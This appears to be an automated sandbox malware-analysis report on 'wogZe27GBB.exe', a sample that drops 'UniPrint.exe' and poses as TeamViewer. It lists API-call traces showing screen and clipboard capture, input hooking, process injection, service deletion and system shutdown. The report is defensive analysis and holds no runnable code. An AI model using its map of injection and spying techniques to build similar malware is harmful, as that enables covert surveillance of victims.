Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70986B70 GetDesktopWindow,GetDC,CreateCompatibleDC,RtlZeroMemory,GetWindowRect,CreateCompatibleBitmap,SelectObject,BitBlt,RtlZeroMemory,GetCursorInfo,RtlZeroMemory,GetIconInfo,RtlZeroMemory,GetObjectW,DrawIconEx,SHCreateMemStream,RtlZeroMemory,VirtualAlloc,RtlZeroMemory,VirtualFree,DeleteObject,DeleteDC,ReleaseDC, 2_2_70986B70
Creates a DirectInput object (often for capturing keystrokes)
Source: wogZe27GBB.exe, 00000000.00000002.248869618.000000000077A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,SendMessageA,GlobalUnWire,SetClipboardData,CloseClipboard, 0_2_00405042
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_7098A020 GetCurrentThreadId,GetThreadDesktop,StrChrW,CreateDesktopW,CreateThread,WaitForSingleObject,CloseHandle,Sleep,CloseDesktop, 2_2_7098A020

System Summary:

barindex
Uses 32bit PE files
Source: wogZe27GBB.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_0040323C EntryPoint,7414E7F0,SetErrorMode,OleInitialize,SHGetFileInfo,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcat,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcat,lstrcmpi,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_0040323C
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70985F30 CommandLineToArgvW,GetProcessHeap,HeapFree,CharLowerW,GetProcessHeap,HeapAlloc,RtlComputeCrc32,GetProcessHeap,HeapFree,GetTickCount,RtlRandom,StrChrW,wsprintfW,WritePrivateProfileStringW,Sleep,Sleep,GetDlgItem,PostMessageW,PostMessageW,PostMessageW,Sleep,Sleep,PostMessageW,Sleep,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,DeleteFileW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,GetTickCount,RtlRandom,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,wsprintfW,GetFileAttributesW,DeleteFileW,StrChrW,StrChrW,StrChrW,wsprintfW,ExpandEnvironmentStringsW,PathIsRelativeW,StrChrW,wsprintfW,StrRChrW,SHCreateDirectoryExW,StrChrW,GetProcessHeap,HeapFree,LocalFree,GetProcessHeap,HeapFree,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 2_2_70985F30
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_70985F30 CommandLineToArgvW,GetProcessHeap,HeapFree,CharLowerW,GetProcessHeap,HeapAlloc,RtlComputeCrc32,GetProcessHeap,HeapFree,GetTickCount,RtlRandom,StrChrW,wsprintfW,WritePrivateProfileStringW,Sleep,Sleep,GetDlgItem,PostMessageW,PostMessageW,PostMessageW,Sleep,Sleep,PostMessageW,Sleep,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,DeleteFileW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,GetTickCount,RtlRandom,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,wsprintfW,GetFileAttributesW,DeleteFileW,StrChrW,StrChrW,StrChrW,wsprintfW,ExpandEnvironmentStringsW,PathIsRelativeW,StrChrW,wsprintfW,StrRChrW,SHCreateDirectoryExW,StrChrW,GetProcessHeap,HeapFree,LocalFree,GetProcessHeap,HeapFree,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 4_2_70985F30
Creates files inside the system directory
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00404853 0_2_00404853
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00406131 0_2_00406131
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_0053C2D6 4_2_0053C2D6
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_004A13AA 4_2_004A13AA
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_0053E430 4_2_0053E430
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_004C97CD 4_2_004C97CD
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_00534810 4_2_00534810
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_005438ED 4_2_005438ED
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_004AC8A9 4_2_004AC8A9
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_00544B6A 4_2_00544B6A
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_004B9F5A 4_2_004B9F5A
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_00546FFB 4_2_00546FFB
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_004A0FB2 4_2_004A0FB2
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_0292F7CD 17_3_0292F7CD
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_0292F9EC 17_3_0292F9EC
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_0292F965 17_3_0292F965
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_0294C17D 17_3_0294C17D
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 20_3_02880ABB 20_3_02880ABB
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: String function: 0040F6FE appears 62 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: String function: 0053BCB5 appears 419 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: String function: 0053E5C8 appears 32 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: String function: 0040DFA6 appears 31 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: String function: 004A1B0C appears 235 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: String function: 0053BCE8 appears 61 times
Contains functionality to launch a process as a different user
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70983760 GetProcessHeap,CreateEnvironmentBlock,RtlZeroMemory,StrChrW,RtlZeroMemory,CreateProcessAsUserW,CreateProcessAsUserW,Sleep,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DestroyEnvironmentBlock,CloseHandle, 2_2_70983760
Contains functionality to call native functions
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00401000 NtdllDefWindowProc_A,BeginPaint,GetClientRect,DeleteObject,CreateBrushIndirect,FillRect,DeleteObject,CreateFontIndirectA,SetBkMode,SetTextColor,SelectObject,SelectObject,DrawTextA,SelectObject,DeleteObject,EndPaint, 0_2_00401000
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70988AF0 EntryPoint,DisableThreadLibraryCalls,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryW,ExitProcess,PathAddBackslashW,PathAddBackslashW,GetProcessHeap,HeapAlloc,GetModuleFileNameW,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecW,PathAddBackslashW,SetCurrentDirectoryW,SHGetSpecialFolderPathW,PathAddBackslashW,StrChrW,lstrcatW,GetFileAttributesW,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameW,PathFindFileNameW,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetUserNameW,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,lstrlenW,GetCommandLineW,CommandLineToArgvW,CharLowerW,StrToIntW,LocalFree,RtlZeroMemory,GetPrivateProfileIntW,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,StrChrW,StrChrW,wsprintfW,wsprintfW,LoadLibraryW,ExitProcess,StrChrW,wsprintfW,LoadLibraryW,FindWindowW,FindWindowW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,StrChrW,wsprintfW,GetProcessHeap,HeapFree,LoadLibraryW,StrChrW,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle, 2_2_70988AF0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_7098B420 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree, 2_2_7098B420
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_709889F0 NtQuerySystemInformation,StrChrW,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,StrChrW,NtWriteVirtualMemory,NtFlushInstructionCache, 2_2_709889F0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_7098B5F0 NtResumeThread,NtClose,HeapFree, 2_2_7098B5F0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_7098B340 NtGetContextThread,NtSetContextThread, 2_2_7098B340
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_7098B570 NtSuspendThread,NtClose, 2_2_7098B570
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_7098B160 NtProtectVirtualMemory, 2_2_7098B160
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70981C90 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory, 2_2_70981C90
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70981A80 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree, 2_2_70981A80
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_7098A880 NtQueryVirtualMemory, 2_2_7098A880
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_7098B0B9 NtProtectVirtualMemory, 2_2_7098B0B9
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_709826E0 RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose, 2_2_709826E0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70985220 RtlZeroMemory,RtlZeroMemory,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle, 2_2_70985220
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_7098B650 RtlMoveMemory,NtFlushInstructionCache, 2_2_7098B650
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70987240 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageW,StrChrW,KillTimer,RtlZeroMemory,StrChrW,wsprintfW,StrChrW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrChrA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntW,StrChrW,wsprintfW,WritePrivateProfileStringW,SetEvent,SetTimer,StrChrW,DispatchMessageW,GetMessageW,KillTimer,VirtualFree, 2_2_70987240
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70982440 LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetCommandLineW,CommandLineToArgvW,lstrcmpiW,lstrcmpiW,StrRChrW,StrChrW,wsprintfW,OpenEventW,CreateEventW,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess, 2_2_70982440
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_7098B1A0 NtOpenThread, 2_2_7098B1A0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70982FF0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessW,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle, 2_2_70982FF0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_709827F0 GetFileAttributesW,GetProcessHeap,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RtlZeroMemory,RtlZeroMemory,CreateProcessW,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree, 2_2_709827F0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70987D00 PostThreadMessageW,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageW,CreateThread,CallWindowProcW, 2_2_70987D00
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70981570 NtAllocateVirtualMemory,NtAllocateVirtualMemory, 2_2_70981570
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70981960 NtProtectVirtualMemory, 2_2_70981960
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_709889F0 NtQuerySystemInformation,StrChrW,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,StrChrW,NtWriteVirtualMemory,NtFlushInstructionCache, 4_2_709889F0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_7098B160 NtProtectVirtualMemory, 4_2_7098B160
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_70988AF0 EntryPoint,DisableThreadLibraryCalls,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryW,ExitProcess,PathAddBackslashW,PathAddBackslashW,GetProcessHeap,HeapAlloc,GetModuleFileNameW,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecW,PathAddBackslashW,SetCurrentDirectoryW,SHGetSpecialFolderPathW,PathAddBackslashW,StrChrW,lstrcatW,GetFileAttributesW,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameW,PathFindFileNameW,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetUserNameW,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,lstrlenW,GetCommandLineW,CommandLineToArgvW,CharLowerW,StrToIntW,LocalFree,RtlZeroMemory,GetPrivateProfileIntW,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,StrChrW,StrChrW,wsprintfW,wsprintfW,LoadLibraryW,ExitProcess,StrChrW,wsprintfW,LoadLibraryW,FindWindowW,FindWindowW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,StrChrW,wsprintfW,GetProcessHeap,HeapFree,LoadLibraryW,StrChrW,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle, 4_2_70988AF0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_70987240 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageW,StrChrW,KillTimer,RtlZeroMemory,StrChrW,wsprintfW,StrChrW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrChrA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntW,StrChrW,wsprintfW,WritePrivateProfileStringW,SetEvent,SetTimer,StrChrW,DispatchMessageW,GetMessageW,KillTimer,VirtualFree, 4_2_70987240
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_7098B340 NtGetContextThread,NtSetContextThread, 4_2_7098B340
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_7098B420 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree, 4_2_7098B420
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_7098B5F0 NtResumeThread,NtClose,HeapFree, 4_2_7098B5F0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_70987D00 PostThreadMessageW,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageW,CreateThread,CallWindowProcW, 4_2_70987D00
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_7098B570 NtSuspendThread,NtClose, 4_2_7098B570
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_7098A880 NtQueryVirtualMemory, 4_2_7098A880
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_7098B0B9 NtProtectVirtualMemory, 4_2_7098B0B9
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_7098B1A0 NtOpenThread, 4_2_7098B1A0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_70981960 NtProtectVirtualMemory, 4_2_70981960
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_70981A80 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree, 4_2_70981A80
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_70985220 RtlZeroMemory,RtlZeroMemory,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,StrChrW,CloseHandle,CloseHandle,CloseHandle, 4_2_70985220
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_70981C90 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory, 4_2_70981C90
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_70982440 LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetCommandLineW,CommandLineToArgvW,lstrcmpiW,lstrcmpiW,StrRChrW,StrChrW,wsprintfW,OpenEventW,CreateEventW,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess, 4_2_70982440
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_70981570 NtAllocateVirtualMemory,NtAllocateVirtualMemory, 4_2_70981570
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_709826E0 StrChrW,RtlZeroMemory,NtCreateSection,StrChrW,NtMapViewOfSection,NtMapViewOfSection,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,StrChrW,NtClose, 4_2_709826E0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_7098B650 RtlMoveMemory,NtFlushInstructionCache, 4_2_7098B650
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_709827F0 GetFileAttributesW,StrChrW,GetProcessHeap,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RtlZeroMemory,RtlZeroMemory,CreateProcessW,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree, 4_2_709827F0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_70982FF0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessW,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle, 4_2_70982FF0
PE file does not import any functions
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameTV.dllT vs wogZe27GBB.exe
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameTeamViewer_Resource.dll\ vs wogZe27GBB.exe
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameTeamViewer.exel& vs wogZe27GBB.exe
PE file contains strange resources
Source: wogZe27GBB.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: wogZe27GBB.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: wogZe27GBB.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UniPrint.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UniPrint.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Windows\System32\svchost.exe Section loaded: xboxlivetitleid.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cdpsgshims.dll Jump to behavior
Contains functionality to delete services
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70983850 OpenSCManagerW,OpenSCManagerW,OpenSCManagerW,OpenServiceW,QueryServiceStatus,ControlService,Sleep,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle, 2_2_70983850
Source: wogZe27GBB.exe ReversingLabs: Detection: 71%
Source: C:\Users\user\Desktop\wogZe27GBB.exe File read: C:\Users\user\Desktop\wogZe27GBB.exe Jump to behavior
Source: wogZe27GBB.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
